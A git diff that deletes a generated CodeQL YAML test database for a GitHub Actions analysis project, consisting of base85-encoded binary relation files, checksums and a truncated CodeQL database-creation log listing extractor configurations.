z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ 
zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 
z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009F3 HW`Vx|E&&!+ 
diff --git a/ql/src/test-db/db-yaml/default/yaml.rel b/ql/src/test-db/db-yaml/default/yaml.rel deleted file mode 100644 index 529b4a834dece968ff95f48071bca09a7a2963c7..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7992 zcmYkA3Cvw(5r+SBz@S#PvI+9H_oskj*-F{5wWZ+JvI!I@7E&l;WeG?Tu?UC?DuNUd z0og)ukI{g;F$M@B7>ru*~XGme|TCHhL#e%sW1>u!y1k1EC$^X)Z52k~7tLdDG)q2c)g&-UFHokEonYTSHl z&#L~Y;W-ycW&Z4qPwGt`5U3)ljxqP zpEqCr&S4*PFI3*f72j(YbZ;FbaqBo6Kcno`@SKV7EEMy@bHwxhsP)ay`Z|LHP$hBe zPoW11BKz0+zQ<1JJTyGD@|=y%N0r2_<9rsN%DjfBGd{GSLwx6N?+3dw?As92=gl(OZKzJYB10sC`eW zar>T#o?QLJbMBT0Z~D3>rv}HSuls)mYW-!kuk}wrPeYZ&eXj%2m8khEYJKzF|7V~| z;^w>m&lE&fHhkRws|q^ghmU*YEY$kuXJ5Go&PJ8Qt$#3jt{`$&Q~!1N=NELSpY@#t zy8yMH^N0T4z3b zb#QFv=^U;JPQLRr-}7=E8lKjd=Mm^yR7pHMKQX`)*EKvBfPFGJw&nS$;0@1(U^fTH zwmd%_yy3YB?6%<8jZyiG&^u81%jbEl{Fk72qDtcCJDzIV?(sQf*r)|dZW^j=g++`gXE zuL~mgkRSe@({C1Z$WQ&Fz`h;4*0;{l=y!u-!~YnbzZabR@b^CXesFB&KgsibsQu*Q z{I^1vqW7b|mvP1SIv#yM2T5E$?&k*uk^8BW_wufNsGviB-phOV;oziaU5*2L47Km0 zHEv(;;U8B&@!Z2d3EuQQ0PJVMvFYnQ{5Wd;$7)~epMm}YRTB5Tyz`$#&40YsH{bRB zC8{Kz_5Jk#PdwT1aeaRq92-8)|M%55-#Iw{mFQEbeT^&jJq7)P4w880|MUP)Jk|7_ z5BBHa*z}#j^IwD4zSdcU{yjK$BUF5Zu0!QxefO1omZSefmBh`r@4p3+bq$}l;s2+g zLw@*pPM-4r8AC{{I>6A!JEE&leewO{AWK! 
zyC42`#T&;9Prj$R?SnUc`S(TV9z{w$`_}W-O$v(FzSgI9=N>{5FZH*;9|?-r`sTy2 zo5CX9$Ums>xh0RYu=MNlJKz1kHU7?6q{MwNe>(ndI#}O3`+;-a%@!1=uWM%Ceerk4 zB8ite%%Ec}OaAPJC+E7`tE7+PC7*k{n-jd|%ZHhDd`2ntvR=-aH5hR6vrl#e_ijQ; ze)u!v?jS(tuxI7(9QMKYx0ml_T=Bhj!9S#U<9Ol8nsoDmH#}#8zdkrNJV)RQ@vVPw z$`qCfqPcN6I*z)CY@&$Nxal?K8u4lJa+~6w+mA8!_#wm zRPf5v`OgPGCO9_pbPmS`C*S>GKEIc`rP%PazVA!V?gT87_?YKO!5f|n$U8YWw&l4z zc*Aoc`P?Z=so(Nk5xn8Kh`iH-W4&|aKLYo=O8!g9_xoD@tMK2BMG`Oh&gUJ$8~$M3 zJA-4xpL@7FJ9xvNwe8Lgjtzg-wmUC)!=JV7R)fpaeQUlvIYZrrSS0cBoG%LA@Z5vE zi-Tjs)BUg}c*E2C^L@dw;px47S@4FZ_vcmM^1O107oI2Lf4Jt?`1n5jXz+$7XS(}X zaBO&bFI|go{i`ZZ=fE0vAFuf}Ugp5>jc#qtzqZyl-+Sr$nqT83-+SqX;0+(|r5l4| z!)Frwror#lRzBV{E5UEZ%G0=F-&62!Dc(3<`a1txgExKMZ?^}>rtb{!JA>E0?&n3| zcLm30y++`7V``}RA*8=mgl`@!vd-w-c- z_rrgn=GS=XI}QB7;7#96!5<2aweRNWX5bHFt?%#o^*lTO?eKqqMG`Od{oa2>P`uVR zpYQ1Ihh}exm;5d9e*{Rs?va}BKHM7rQL}5@2j@H;|ED@w-z)3l`TDt_ICZj5_QikP z><#f!XM6l71jQSkbMc=n>En3G_k8^-c+HoO=j%7YvCd80IsYy=`OZz;@BOEOW5a(E z{Ezs~;fc!MIqZY~G*+I*73aAN{-26Bj+gqLufGIuc+Ld>TX1Z6j==wcZ~dn$PwVfD zzYdEeUg}Tb|0{T{KMQ{+@c)|3fAYi@p0jy;hG!)4@qC^Q-tgR&yyt>r!_#}_f59tH z=jnNOt&vhc^K=d`1}EPf^ZDNItr?y^`@Tnj`&lIM@a$g_yy3ZkyiJ1pA=LWt>|YkV z;kgi;J)xBP4bPslH{cD=MdW$@kdnVK57r;yb7th<_vGh$e+fQkLrJ{kGoPNbG~f;Y z!@)U|1J2*@=RWK?O9S5U=RWK?0|UMxIcT&e3>U_t%y8N1n2Hh z63>0u?;pJ3$@hMLU~oT#+Lu}O2V-5Yxs|8&PryF}izHt1snO2^G~eIh?qT!c*t3>O z;w7Io=@$SZef$6CxtIDwgBwKUa}bY*VXbfedY-L+K0bRwNxbC4y?i$v$f|!DepOm**PrbFoO` zmx1TK%(w5Q;Fn{O#K-S-MewFCwfheS_d}?2v+tF`>wAf_hW*tQ=ZuW=*~|Sk z`0{E09X%KS+L~YErTz}!*9C9*cz&-Bjt!rqc)THa!-uod-xwU5xg7(3Q*iR#pYr#f zxg|I@-!GHkx8l>UzlQwhdEN?rKmKi4-^;k-oG-_}U1vkQ)Mw56I}6O`>U+6P+!_5{ Q!LfNS=X`hY=Dm*lKmT;wC;$Ke diff --git a/ql/src/test-db/db-yaml/default/yaml.rel.checksum b/ql/src/test-db/db-yaml/default/yaml.rel.checksum deleted file mode 100644 index a3783e268b8d3866cb97455ff14cd484ab0b8d47..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 ScmZQzU|?hbf)7vo?g9V^eFH)O 
diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel b/ql/src/test-db/db-yaml/default/yaml_locations.rel deleted file mode 100644 index 014f03a3a638a16c87b040ee21668cc0ff098479..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 2664 zcmWN~QxqLW06@VPHFg@?wr$&uZQHhO+iqhtb{gBZt;IqCk8QzLo8wwp9CbN28l>a5~`DwWF#jADM>|Y(vX&Pq^BAg$V)~t zk(n%HB^%kvLk@D1i`?X+H2En&K?+frA{3<<#VJ8aN>PTYl%*WysX#?4QJE^#;taK^ zLtW}op9VDKG>vFX6V}s|W;CY-Eont-I?#r;w4*&8=|pGN(S?C@r5oMpK~H+on*sEp zFa7AxAjUJ8Aq-_0!x_OyMlqT(jAa}XSj$8vF_|e$Wg63&!Axc`n>oy79`jkl0v57} z#Vlbd%UI3|R3D%ZGf9Yt?&lUv;84tKd{KeFEE2M>72BOddFr#$01 zFL=o-zVn(lyyYG5`M^g$@tH4tfTJ9w~`W0uqvfL?k8&$w^8wQjwZ83?VJ)NY7w0kdaJeCJR}~Ms{+L zlUxiUHzmkJUhLRG5MnHtpOFKSVn zI@F~e^=Uvu8qt_0G^G>GXif`S(u&r!p)KubPX{{Eg@JUX8{O$aPkPatKJ=v@{TaY; z_A!EyjAArn7|S^JGM))cWDk>=%oL_Fjp@u_H#6D9EM_x@xy)le3s}e^7PEwnEM*zX zS;0zHv6?lkWgY9;z-D%_g}?cSt!!gEJJ`woKpQFW z4CnZdvs~m7m%W=&uW*%X)*19VH@L|yZgYpb+~YnEc<6k3eZ+en^Mt27<2f&Q$va;0 znm4@VgZn}BBcJ%p7rye1@BH8=zxeHZ07K9O1S2>h_=AvyA~azLOE|(4frvyRGVzH* zRHE@G(TPD!ViB7-#3ddHNk<|QlZ2!sBRMHZNh(s4hO}g16P^DMC?7QH>rj>?p$0u`x571~ghYE-8NHTjEL)TRz~sYh$- z(}0FFqA^WqN;8_%f|j(RE&XUmdpgjOPIRUVJ?Tm}y3>PR^rjDe>CXrTFpxnEW(Y$W w#&AY6hOw+*9OIe5L?$trDNJP=)0x3cW-*&NEN3pun8$n;u#iP8W(iCG2Txl!IsgCw diff --git a/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/src/test-db/db-yaml/default/yaml_locations.rel.checksum deleted file mode 100644 index bb0c636593a1f0c3ca10cb8d7337d3771bfd6e82..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hb0!AH1O#lGM09gP4 
diff --git a/ql/src/test-db/db-yaml/default/yaml_scalars.rel b/ql/src/test-db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index e045b05d47e291009889305846e60f9c1b64b7a1..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3048 zcmYk;d+gU!9LMp`Ihb3h7)ta-E@7^r%cv}Vt`(U}X-P|JmYB2<=1#dKA++Cq%YDY? z&deWXjm>6;G50a|xy-CJb9p^K-{)`h-pFGyeq5^N-Q{q@Sc&%W;}#9j`~GKUp)+WX&3<>I2iCmUd;@L1{D6C~}+G zs=LNnntaaFqtnmT?MOIg}Y8tY- zPVEg8dSd$fHS;{6*`J4WCw;HxxqX^_ zTc_E#N79(PC+)E`>V&i>(ilH6?U^)+J$$xR(~$Y|n#^C+Q_{bz+2>dFsp((S?A_~{ z{NK<#?@i6QSg$!JZ|Q02-_x9v_cdqvL(Mt)SWi#?sbGM z|ES6NXWdEvtLFE=>lx|)(B%AQ8guugZAhcYd1D&ml|PrRnkHwzRR541%BK3< zcni(%x6;Y24AA_Zj5xb<;+-7N87o6{zE_1TsQk9@p47mYvrY|)M|9Z?jybPXaxUCw zD)SZYFqNFkAze0^yBwx@?%{e^%$`xnzl`gWZ(%t~=MEO`0M&`foyxk(q%OIGg&Zm7 zKdDQ;m*o^qKAcM`dsH}!6wl&3QF*6wW|!?eXX`w_u$L6`%SliM&TR9cu&00@w`)6)OZqRH(uO>SRkp8J*NE_|)Y^E*v$Kj`7{Pr4KTqPYvd zY3>5w8H)KgblKj8jhcM^(q#U(=2`#hkxf%K(V3@irpL#d>&#QP)VT{aziTV=)a2M! z_PTDTJ8|-AE6=Sv=-lJl|No-wbxn@_dtH-VTiNTHjN0++bi!XDU_m^pJIr^l9-(s=>S&#{)NwjvHS2CG>#7r4HGJP{-m|SS@v(Yr z+@mjwv+lOCzjd-EtEoEsTTj=l{|tReeAfSdKV6gUIl2?i(qubZ&xq$}vYi`~OV(BA zIZn3o9Vgp`j Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. 
-[2024-02-03 10:17:51] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:51] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-02-03 10:17:51] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. -[2024-02-03 10:17:51] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. 
-[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. -[2024-02-03 10:17:52] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. -[2024-02-03 10:17:52] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - 
info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. 
Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" - } - ], - "yaml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-02-03 10:17:52] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test -[2024-02-03 10:17:52] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-02-03 10:17:52] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-02-03 10:17:52] [PROGRESS] database init> Calculated baseline information for languages: (387ms). -[2024-02-03 10:17:52] [PROGRESS] database init> Resolving extractor yaml. -[2024-02-03 10:17:52] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:52] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:52] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. This in-progress database is ready to be populated by an extractor. -[2024-02-03 10:17:52] Plumbing command codeql database init completed. 
-[2024-02-03 10:17:52] [PROGRESS] database create> Running build command: [] -[2024-02-03 10:17:52] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:52] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. -[2024-02-03 10:17:52] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] -[2024-02-03 10:17:52] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, 